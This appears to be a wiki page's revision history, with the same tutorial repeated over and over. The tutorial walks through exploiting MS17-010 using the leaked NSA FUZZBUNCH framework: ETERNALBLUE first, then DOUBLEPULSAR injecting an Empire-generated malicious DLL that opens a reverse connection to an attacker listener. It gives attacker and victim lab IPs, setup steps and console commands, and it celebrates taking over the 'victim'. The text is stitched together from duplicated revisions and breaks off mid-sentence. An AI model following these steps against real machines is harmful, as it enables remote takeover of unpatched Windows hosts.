We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''

NSA - MS17-010

2017-04-30T17:07:00Z

Lphanvan: /* Getting Empire session */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

WE WIN!!!!!!

NSA - MS17-010

2017-04-30T17:06:42Z

Lphanvan: /* Creating listener and malicious DLL with Empire */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

File:Capture16.PNG

2017-04-30T17:06:05Z

Lphanvan:

File:Capture15.PNG

2017-04-30T17:06:01Z

Lphanvan:

NSA - MS17-010

2017-04-30T17:05:23Z

Lphanvan: /* Injecting the malicious DLL via DoublePulsar */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Creating listener and malicious DLL with Empire===

NSA - MS17-010

2017-04-30T17:04:25Z

Lphanvan: /* Injecting the malicious DLL via DoublePulsar */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

File:Capture14.PNG

2017-04-30T17:04:19Z

Lphanvan:

File:Capture13.PNG

2017-04-30T17:03:49Z

Lphanvan:

NSA - MS17-010

2017-04-30T17:02:59Z

Lphanvan: /* Injecting the malicious DLL via DoublePulsar */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

File:Capture12.PNG

2017-04-30T17:02:50Z

Lphanvan:

NSA - MS17-010

2017-04-30T17:02:31Z

Lphanvan: /* Injecting the malicious DLL via DoublePulsar */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

File:Capture11.PNG

2017-04-30T17:02:23Z

Lphanvan:

NSA - MS17-010

2017-04-30T16:57:32Z

Lphanvan: /* Generating malicious DLL by using Empire */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
